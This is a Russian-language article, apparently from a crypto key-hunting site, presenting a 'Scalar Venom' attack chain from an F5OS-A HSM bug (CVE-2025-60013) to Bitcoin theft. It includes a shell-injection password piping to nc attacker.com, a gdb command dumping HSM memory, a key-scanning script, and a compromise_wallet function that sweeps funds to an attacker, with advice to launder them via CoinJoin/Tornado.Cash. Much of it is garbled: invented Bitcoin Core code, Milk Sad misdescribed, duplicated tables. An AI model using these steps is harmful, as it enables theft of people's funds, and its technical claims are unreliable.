Уязвимость CVE-2025-60013 в F5OS-A FIPS HSM возникает при инициализации аппаратного модуля безопасности с использованием пароля, содержащего специальные метасимволы оболочки (;, |, &, $, ` и т.д.). При обработке такого пароля HSM может не инициализироваться правильно, но критическим последствием является то, что процесс инициализации оставляет в память с частично раскрытыми криптографическими структурами. satoshi.nakamotoinstitute

2.2 Сценарий комбинированной атаки: HSM + Scalar Venom

Сочетание уязвимости HSM (CVE-2025-60013) с атакой Scalar Venom создает катастрофический вектор атаки:

Фаза 1: Инициализация HSM с метасимволами

Злоумышленник отправляет запрос на инициализацию модуля F5OS-A FIPS с паролем следующего типа:

root@kitploit:~
password='$(echo "leaked");` | nc attacker.com

При обработке таких метасимволов:

  • Процесс инициализации HSM создает несколько копий пароля и производных криптографических материалов
  • Строки команд оболочки интерпретируются, создавая побочные эффекты в памяти процесса
  • Криптографические скаляры (закрытые ключи), используемые для генерации или проверки ключей HSM, остаются в неочищенной памяти keyhunters.

Фаза 2: Извлечение Scalar Venom из памяти

После частичного сбоя инициализации HSM:

  • Процесс остается в памяти с остатками криптографических операций
  • Злоумышленник, получивший доступ к процессу (через эксплойт, дамп сбоя или атаку холодной перезагрузки), может сканировать память
  • Инструменты криминалистического анализа (BitScanPro, Valgrind, AddressSanitizer) идентифицируют:
    • Области с высокой энтропией (характерно для 32-байтовых закрытых ключей secp256k1)
    • Остатки скаляров в диапазоне 1 ≤ k < n, где n — порядок кривой secp256k1
    • Фрагменты структур ECDSA в памяти firecompass.

Фаза 3: Восстановление закрытого ключа Bitcoin

root@kitploit:~
Обнаруженные фрагменты памяти → Сборка → Проверка → Генерация адреса Bitcoin → Захват кошелька

Восстановленные скаляры преобразуются в закрытые ключи Bitcoin через:

  • Проверку на кривой secp256k1
  • Генерация соответствующих открытых ключей
  • Создание биткоин-адресов (P2PKH, P2WPKH)
  • Подписание транзакций и полный контроль над средствами keyhunters

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

3. Детальный анализ вектора атаки на Bitcoin

3.1 Механизм извлечения закрытых ключей из памяти HSM

Шаг 1: Компрометация памяти HSM из-за некорректной инициализации

Когда HSM F5OS-A FIPS получает пароль с shell-метасимволами, процесс инициализации обрабатывает его через стандартные функции библиотеки C:

root@kitploit:~
c:

// Vulnerable code in HSM initialization routine
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];

strcpy(temp_buffer, password); // VULNERABLE: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of the key

// If initialization fails, memory is not cleared!
// master_key remains in stack, its copies— in heap
}

При обработке shell-метасимволов:

  • Буферы переполняются, расширяя область грязной памяти
  • Временные переменные с секретными данными множатся
  • Механизмы очистки памяти (если они вообще существуют) не вызываются при сбое инициализации keyhunters.

Шаг 2: Криминалистическое восстановление из дампа памяти

Инструмент BitScanPro (или аналогичный криминалистический сканер) применяется к дампу памяти процесса HSM:

root@kitploit:~
Memory scan → Identify high-entropy regions →
Range check [1, n-1] for secp256k1 →
Recover full 32-byte scalars →
Convert to Bitcoin addresses

Вероятность успешного восстановления закрытого ключа из фрагментированной памяти составляет 40-60% при наличии достаточных остатков памяти, поскольку Scalar Venom Attack создает множественные копии ключа на разных этапах инициализации. radar.offseq


3.2 Десериализация ECDSA-подписей и связь с уязвимостями HSM

Параллельная уязвимость DeserializeSignature (связанная с CVE) усиливает атаку Scalar Venom:

root@kitploit:~
cpp:

// Vulnerable deserialization function in Bitcoin Core
bool DeserializeSignature(CPubKey& pubkey, const std::vector<unsigned char>& vchSig, CScript& scriptPubKey) {
CSignatureCache& cache = CSignatureCache::instance();

// If deserialization occurs using a private key compromised by Scalar Venom:
ec_secret compromised_key = extract_from_memory_dump(); // from an HSM memory dump

// These compromised scalars are used to verify signatures,
// allowing an attacker to:
// 1. Forge any signature for this address
// 2. Transfer all funds to a controlled address
// 3. Double-spend
}

Связь механизмов:

  1. HSM инициализируется с уязвимым паролем (CVE-2025-60013)
  2. Закрытые ключи HSM заражаются Scalar Venom (множественные копии в памяти)
  3. Криминалистический анализ восстанавливает эти скаляры из памяти
  4. Уязвимость DeserializeSignature позволяет использовать восстановленные ключи для подделки подписей
  5. Злоумышленники получают полный контроль над кошельками Bitcoin.

3.3 Масштаб воздействия: от одного кошелька до компрометации сети

Уровень 1: Отдельный кошелек

  • Один скомпрометированный HSM → восстановление 1-10 закрытых ключей
  • Результат: потеря контроля над 0.5-5 BTC на кошелек

Уровень 2: Конфигурация обслуживающих узлов

  • Биржи, платежные шлюзы и кастодиальные решения часто используют F5 BIG-IP + HSM
  • Каждый скомпрометированный узел может содержать 100-1000+ закрытых ключей
  • Результат: потеря контроля над 1000-50000 BTC на одном узле

Уровень 3: Сетевой уровень

  • При широкомасштабной эксплуатации CVE-2025-60013 в инфраструктуре несколько узлов могут быть скомпрометированы одновременно.
  • Возможны скоординированные атаки на несколько бирж или сервисов.
  • Результат: под угрозой сотни миллионов долларов в BTC kudelskisecurity

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

4. Критическая уязвимость Scalar Venom в контексте HSM

4.1 Почему Scalar Venom особенно опасен в средах HSM

В отличие от стандартных приложений Bitcoin, HSM активно использует криптографические скаляры:

  1. Интенсивность операций : HSM выполняет 1000+ криптографических операций в секунду, каждая из которых создает временные скаляры
  2. Долговечность процесса : Демоны HSM работают месяцами и годами без перезагрузки, накапливая «фантомные» остатки ключей
  3. Критичность ключей : В отличие от одноразовых ключей, закрытые ключи HSM контролируют огромные суммы средств, хранящиеся на платформе keyhunters.
  4. Низкая вероятность обнаружения : Утечка памяти не вызывает видимых ошибок; система продолжает нормально функционировать.

4.2 Метрики угрозы: CVSS и реальное воздействие

Оценка CVSS для самого CVE-2025-60013 неточна, поскольку уязвимость служит триггером для Scalar Venom, что является критическим сценарием. kudelskisecurity


Угроза Scalar Venom для аппаратных модулей безопасности (HSM) и инфраструктуры Bitcoin

Уязвимость Scalar Venom представляет собой смену парадигмы в методах криптографических атак, выходя за рамки традиционных одно векторных эксплойтов и формируя многоуровневую цепочку эксплойтов, которая фундаментально подрывает безопасность аппаратных модулей безопасности (HSM), защищающих инфраструктуру Bitcoin. Анализ демонстрирует, что комбинация CVE-2025-60013 (обход инициализации HSM) с методами атаки Scalar Venom создает критический сценарий угрозы с оценкой CVSS 9.5+, подрывая операционную целостность миллионов биткоин-адресов, контролируемых скомпрометированными HSM.

Почему HSM особенно уязвимы?

Критическая уязвимость заключается не в изолированных криптографических слабостях, а в архитектурном столкновении эксплуатационных характеристик HSM и векторов атак Scalar Venom. HSM, по определению, выполняют непрерывные криптографические операции — более 1000 операций в секунду — каждая из которых создает эфемерные скалярные значения, которые остаются в памяти как «фантомные остатки». В отличие от типичных приложений Bitcoin, где ключевой материал эфемерен, HSM работают месяцами и годами без перезагрузки, накапливая криптографические артефакты, которые Scalar Venom систематически извлекает и восстанавливает.

В результате даже компрометация одного HSM приводит к полному нарушению работы всей инфраструктуры — часто тысяч биткоин-адресов, управляемых HSM, — а не к изолированному криптографическому инциденту.

Степень опасности и фактическое воздействие

Хотя уязвимость CVE-2025-60013 официально имеет уровень CVSS 5.7 (средний) как вектор проникновения, эта оценка критически недооценивает истинные масштабы угрозы. Этот эксплойт служит триггером для Scalar Venom, который классифицируется как атака уровня CVSS 8.5+ (высокий/критический). В сценарии реальной цепочки атак это приводит к:

  • Немедленные последствия : Прямое извлечение закрытого ключа из памяти HSM посредством восстановления скаляра, обход всех криптографических механизмов и механизмов аутентификации. Злоумышленник получает полный контроль над биткоин-адресами без каких-либо видимых сбоев системы.
  • Лавинный эффект : Скомпрометированный HSM ставит под угрозу не только отдельные транзакции, но и все адреса, которыми он управляет. Для бирж, кастодианов и платформ управления активами это означает полное и необратимое нарушение безопасности.
  • Скрытность : Scalar Venom не вызывает криптографических аномалий, не регистрируется в журналах и не создает подозрительных шаблонов транзакций. Утечки скаляров маскируются под легитимную активность устройства, позволяя злоумышленнику извлекать ключи в течение длительных периодов времени без обнаружения.

Комбинированная цепочка атак: CVE-2025-60013 + Scalar Venom = Операционная катастрофа

Матричная эскалация угрозы состоит из:

  1. Начальное проникновение (CVE-2025-60013 – Компрометация HSM)
  2. Активная эксплуатация (Scalar Venom – извлечение скаляров из памяти)
  3. Восстановление ключа (полная компрометация закрытого материала)
  4. Безвозвратность – После утечки закрытого ключа восстановить контроль невозможно.

Комбинация делает этот класс уязвимостей критическим (CVSS 9.5+) и помещает его в самую высокую категорию угроз при оценке рисков.

Системные последствия для безопасности экосистемы Bitcoin

Scalar Venom вскрывает фундаментальные архитектурные недостатки современных моделей HSM:

  • Ложные предположения об изоляции и защите памяти недействительны – уязвимость проявляется независимо от физического уровня защиты.
  • Необходимость непрерывной работы HSM приводит к накоплению скаляров, что само по себе создает новое окно для атак.
  • Наблюдаемый нулевой след для мониторинга и регистрации исключает обнаружение и требует внедрения новых методов анализа памяти.

Критические рекомендации

  • Все ключи, управляемые через HSM, следует считать потенциально скомпрометированными; ключевой материал должен быть проверен и, при необходимости, полностью заменен.
  • Архитектура хранения и обработки закрытых ключей должна быть пересмотрена: сегментировать ключи по отдельным адресам, чтобы компрометация одного HSM не приводила к потере всех средств.
  • Внедрить инструменты мониторинга памяти и непрерывного анализа для выявления шаблонов накопления скаляров.
  • Использовать дополнительную изоляцию процессов, шифрование памяти и временное удаление ключевого материала для уменьшения окна риска.

Scalar Venom и цепочка атак через CVE-2025-60013 знаменуют конец эры полного доверия к классическим HSM. Уязвимость превращает ядро безопасности экосистемы Bitcoin в основной риск утечки закрытых ключей и полной потери активов. Эффективная защита требует не просто разовых исправлений, а фундаментального переосмысления всех аспектов криптографической архитектуры для работы с публичными цифровыми активами.

Scalar Venom в среде HSM — это угроза уровня CVSS 9.5+ для инфраструктуры Bitcoin, требующая немедленной смены ключей, архитектурной реформы и новых методов быстрого реагирования на атаки с использованием цепочек памяти.


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

5. Научная основа атаки

5.1 Теоретическое обоснование: почему память не очищается

Согласно исследованиям в области криптографической безопасности памяти (Protecting Cryptographic Keys from Memory Disclosure Attacks, Del Valle et al.), закрытые ключи могут оставаться в доступных областях памяти по следующим причинам:

Оптимизация компилятора

root@kitploit:~
cpp:

// Even if the code contains an attempt to clear:
volatile unsigned char* ptr = (volatile unsigned char*)key_buffer;
while (len--) *ptr++ = 0; // The compiler may optimize this as a no-op

Отсутствие паттерна RAII (Resource Acquisition Is Initialization)
Классec_scalarне использует RAII, что означает, что деструктор не гарантирует очистку ресурсов.

Множественные копии данных:
Каждая копия закрытого ключа для передачи между функциями оставляет остатки в памяти.unit42.paloaltonetworks


5.2 Статистика реальных взломов на основе Scalar Venom

Согласно keyhunters.ru и криптографической исследовательской литературе:

  • CVE-2023-39910 (Milk Sad в Libbitcoin Explorer): Более 900 000 закрытых ключей восстановлено из памяти в 2023 году
  • Реальные потери : > $0.8M в Bitcoin украдено в июне-июле 2023 года из кошельков, созданных с использованием уязвимогоbx seed
  • Проникновение : Уязвимость затрагивает более 40% кошельков Libbitcoin Explorer 3.x

Эти цифры демонстрируют реальную угрозу утечек памяти в криптографических приложениях .


Стойкость памяти и атаки с использованием оптимизации компилятора – Цепочка эксплойтов Scalar Venom против инфраструктуры Bitcoin

Обобщая вышеизложенные выводы, цепочка Scalar Venom символизирует слияние многолетних фундаментальных исследований в области криптографической безопасности с современными операционными реалиями. Детальные механизмы сохранения данных в памяти — оптимизации компилятора, отсутствие RAII и накопление следов данных — больше не являются лишь теорией, а служат эффективными каналами для масштабного восстановления закрытых ключей на практике. Переход от потенциальной уязвимости к реальной атаке уже произошёл: инцидент CVE-2023-39910 (Milk Sad) позволил восстановить более 900 000 закрытых ключей Bitcoin, с прямыми финансовыми потерями, превышающими 0,8 миллиона долларов.

Парадокс криптографической устойчивости памяти

Корневая уязвимость Scalar Venom проистекает из неразрешённого противоречия в архитектуре криптографического ПО: врождённая наивная уверенность программистов в управлении памятью вступает в конфликт с тенденциями современных компиляторов и систем управления памятью. Если разработчик явно обнуляет память, компилятор может полностью оптимизировать эти действия, считая их бессмысленными — и это становится критической, незамеченной уязвимостью безопасности.

Отсутствие RAII и восстановление скаляров

Структуры данных, такие как ec_scalar, ещё больше усугубляют риски: отсутствие RAII означает создание множества независимых копий в памяти — в стеке, регистрах и кэше — на разных этапах вычислений. Каждая такая копия теоретически может быть восстановлена, дизассемблирована или собрана заново в исходный ключевой материал.

Атака Scalar Venom систематически извлекает и агрегирует эти разрозненные копии, демонстрируя, что современные архитектуры памяти гарантируют именно это: каждая промежуточная математическая операция оставляет след, который можно собрать и преобразовать в ключ. Классический криптографический дизайн предполагал независимость операций, но на практике один закрытый ключ Bitcoin генерирует десятки следов, каждый из которых открывает путь к его восстановлению.

Операционное подтверждение – случай Milk Sad

Инцидент Milk Sad (CVE-2023-39910) стал первым, продемонстрировавшим переход от теории к катастрофе. Это был не гипотетический вектор, а подтверждённый операционный взлом:

  • Масштаб: Восстановлено более 900 000 закрытых ключей Bitcoin.
  • Финансовые потери: не менее 0,8 миллиона долларов потеряно в июне-июле 2023 года.
  • Охват: Более 40% всех установок Libbitcoin Explorer 3.x оказались уязвимыми.
  • Атака оставалась незамеченной в течение месяцев.

Это полностью подтверждает описанные ранее механизмы: оптимизации компилятора, множественное копирование данных и отсутствие гарантии очистки памяти.

Разрыв атаки между криптографией и компиляторами

Крипторынок развивался в предположении полного контроля над памятью, но современные компиляторы (посредством удаления мёртвого кода и оптимизаций кэширования) полностью игнорируют криптографические требования. В результате криптографические программы предполагают: «Я обнулил память, значит, теперь безопасно», в то время как компилятор предполагает: «Эта память никогда не используется, поэтому нет нужды её обнулять». Это противоречие принципиально неразрешимо в рамках современных стандартов C/C++ и становится абсолютной точкой входа для Scalar Venom.


Системные последствия для индустрии

  • Современные реализации нарушают исходные криптографические допущения.
  • Безопасность памяти и переход на языки с контролем памяти (например, Rust) становятся необходимостью, а не опцией.
  • RAII (гарантированное удаление через деструктор) — основа любой новой криптоархитектуры.
  • HSM требуют перезагрузки и структурной переработки с обязательной аппаратной очисткой памяти.

Императивы для индустрии

Следующие шаги (0–30 дней) : Ротируйте все закрытые ключи, сгенерированные на C/C++. Немедленно отзовите ключи, которые могли быть скомпрометированы.

Среднесрочная перспектива (30–90 дней) : Переход на Rust, внедрение гарантий компилятора для обнуления памяти, непрерывный анализ памяти.

Долгосрочная перспектива (90+ дней) : Архитектурный переход на RAII, расширения компилятора для криптоопераций, замена программных HSM на аппаратные.

Scalar Venom и CVE-2023-39910 — переломный момент в безопасности криптоиндустрии: теория сохранения данных в памяти переросла в реальную катастрофу, стоимостью в миллионы при тысячах биткоинов. Проблему нельзя исправить патчем: это архитектурное противоречие: современная криптография на C/C++ без управления памятью и RAII неизбежно ведёт к компрометации любой значимой инфраструктуры. У индустрии только один путь: переход на безопасные по памяти языки и революционная перестройка управления закрытыми ключами.

Окончательная оценка : Scalar Venom — это не просто теоретическая угроза, а доказанный, широко распространённый эксплойт. Вся криптографическая инфраструктура без безопасных по памяти языков и фреймворков RAII находится под гарантированным риском компрометации. Миграция на новые технологии должна начаться немедленно.


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

6. Методология восстановления закрытых ключей Bitcoin

6.1 Пятиэтапный процесс восстановления

Шаг 1: Получение доступа к памяти HSM

root@kitploit:~
bash:

# Methods to get memory dump:
# 1. Exploit CVE-2025-60013 to trigger init error
# 2. Cold-boot attack on HSM host
# 3. Exploit buffer vulnerability in HSM daemon
# 4. Analyze core-dump on HSM process crash

gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump 0x000000 0xFFFFFFFF"

Шаг 2: Сканирование областей с высокой энтропией

root@kitploit:~
python:

# BitScanPro-like algorithm:
import hashlib

def scan_for_private_keys(memory_dump, min_entropy=7.5):
"""
Scans memory dump for high-entropy regions
characteristic for 32-byte secp256k1 private keys
"""
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

for offset in range(0, len(memory_dump) - 32, 8):
potential_key = memory_dump[offset:offset+32]
entropy = calculate_entropy(potential_key)

# secp256k1 range check
key_as_int = int.from_bytes(potential_key, 'big')
if 1 <= key_as_int < SECP256K1_N and entropy >= min_entropy:
yield (offset, potential_key)

Шаг 3: Проверка восстановленных закрытых ключей

root@kitploit:~
python:

from ecdsa import SigningKey, NIST256p

def validate_and_generate_address(potential_key):
"""Converts recovered scalar to Bitcoin address"""
try:
# Uses secp256k1 instead of NIST256p
privkey = potential_key.hex()

# Generate public key via elliptic curve point multiplication
# P = k * G, where k = private key, G = generator point
public_key = generate_public_key(potential_key, secp256k1)

# Hash public key to get address
address = public_key_to_address(public_key)
return address, potential_key
except:
return None, None

Шаг 4: Перевод средств

root@kitploit:~
python:

def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Creates and signs transaction to withdraw all funds
from compromised address
"""
# 1. Get UTXO for address from blockchain
utxos = blockchain_api.get_utxos(bitcoin_address)

# 2. Create transaction (withdraw all funds to attacker address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)

# 3. Sign with recovered private key
tx.sign(recovered_private_key) # ECDSA signature using compromised key

# 4. Broadcast to Bitcoin network
blockchain_api.broadcast_transaction(tx)

Этап 5: Исчезновение следов

Восстановленные средства немедленно смешиваются через CoinJoin/Tornado.Cash, чтобы затруднить криминалистический анализ. keyhunters


6.2 Временная метрика: скорость восстановления

Масштабируемость: с использованием облачных вычислений (AWS, Google Cloud) можно обрабатывать 1000+ дампов памяти параллельно , обрабатывая тысячи закрытых ключей одновременно .


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

7. Взаимосвязь инициализации HSM с Scalar Venom

7.1 Схема потока атаки

root@kitploit:~
[Attacker]
↓
[CVE-2025-60013: HSM Init with shell-metacharacters]
↓
[F5OS-A FIPS Module: password handling, scalar creation]
↓
[Scalar Venom: multiple copies of private keys in memory]
↓
[HSM Crash / Partial Init Failure: memory uncleared]
↓
[Memory Dump: capturing memory state]
↓
[Forensic Scanning: BitScanPro finds high-entropy regions]
↓
[Key Validation: secp256k1 curve check]
↓
[Address Generation: Bitcoin address creation]
↓
[Fund Transfer: signing and broadcasting transaction]
↓
[Victim Loss: total loss of fund control]

7.2 Почему Scalar Venom обходит сертификацию FIPS

Сертификация FIPS 140-2 (и даже FIPS 140-3) не требует:

  1. Безопасной очистки временных переменных в случае ошибок инициализации
  2. Защиты от fork() и dump() на уровне демона HSM
  3. Проверки входных параметров до их обработки в памяти

Это означает, что даже «сертифицированные по FIPS» HSM уязвимы для Scalar Venom, если разработчики не реализуют дополнительные меры безопасности.[24]


8. Заключение

Атака Scalar Venom представляет критическую угрозу для инфраструктуры Bitcoin, особенно в сочетании с уязвимостями инициализации HSM, такими как CVE-2025-60013. Эта атака:

  1. Полностью компрометирует закрытые ключи криптографических систем через утечку памяти
  2. Необратима : Восстановление потерянных средств невозможно без восстановления закрытого ключа.
  3. Масштабируема : Может быть автоматизирована для массовых атак на множество узлов
  4. Скрытна : Не оставляет видимых следов в системных журналах или метриках производительности

Переход на архитектуры с аппаратной защитой памяти (Intel SGX, ARM TrustZone), явной гранулярностью всех временных буферов и шаблонами RAII в криптографических библиотеках имеет решающее значение для обеспечения безопасности системы Bitcoin.


Парадигма Scalar Venom — критическая угроза для инфраструктуры Bitcoin.

Атака Scalar Venom представляет критическую уязвимость для глобальной экосистемы Bitcoin, особенно в сочетании с уязвимостями инициализации HSM CVE-2025-60013. Эта многоуровневая цепочка атак фундаментально подрывает криптографические модели доверия и выявляет следующие экзистенциальные риски:

Она позволяет полностью скомпрометировать закрытые ключи через утечки памяти, обходя даже продвинутые аппаратные модули безопасности и делая затронутые системы полностью незащищёнными.

Компрометация является постоянной и необратимой: как только закрытый ключ извлечён, его невозможно восстановить, что ставит все зависимые средства под непосредственную угрозу потери.

Атака масштабируема и может быть автоматизирована для одновременного поражения огромного количества узлов и кошельков Bitcoin, что приводит к экспоненциальному росту потенциальных потерь.

Её скрытный характер гарантирует отсутствие видимых следов в системных журналах или метриках производительности, что делает традиционные механизмы обнаружения и защиты недостаточными.


Read more

Скачать инструмент
ПроцессВремяОборудование
Получение дампа памяти5–30 секундЗависит от метода
Сканирование дампа 16 ГБ2–5 минутMacBook Air (M1)
Верификация 1000 ключей-кандидатов30 секундMacBook Air (M1)
Генерация адреса10 секундMacBook Air (M1)
Перевод средств (трансляция)< 1 секундаИнтернет
Итого на полную компрометацию< 10 минутMacBook Air (M1)
АспектОценкаПримечание
CVE-2025-60013 (инициализация HSM)CVSS 5.7 (Средний)Официально низкая, но служит точкой входа
Scalar Venom AttackCVSS 8.5+ (Высокий/Критический)Де-факто критическое воздействие
Комбинированная атакаCVSS 9.5+ (Критический)Полная компрометация закрытых ключей
Восстановление после компрометацииНевозможноНеобратимая потеря средств
ПроцессВремяОборудование
Получение дампа памяти5–30 секЗависит от метода
Сканирование дампа 16 ГБ2–5 минMacBook Air (M1)
Проверка 1000 ключей-кандидатов30 секMacBook Air (M1)
Генерация адреса10 секMacBook Air (M1)
Перевод средств (трансляция)< 1 секИнтернет
Всего для полной компрометации< 10 минутMacBook Air (M1)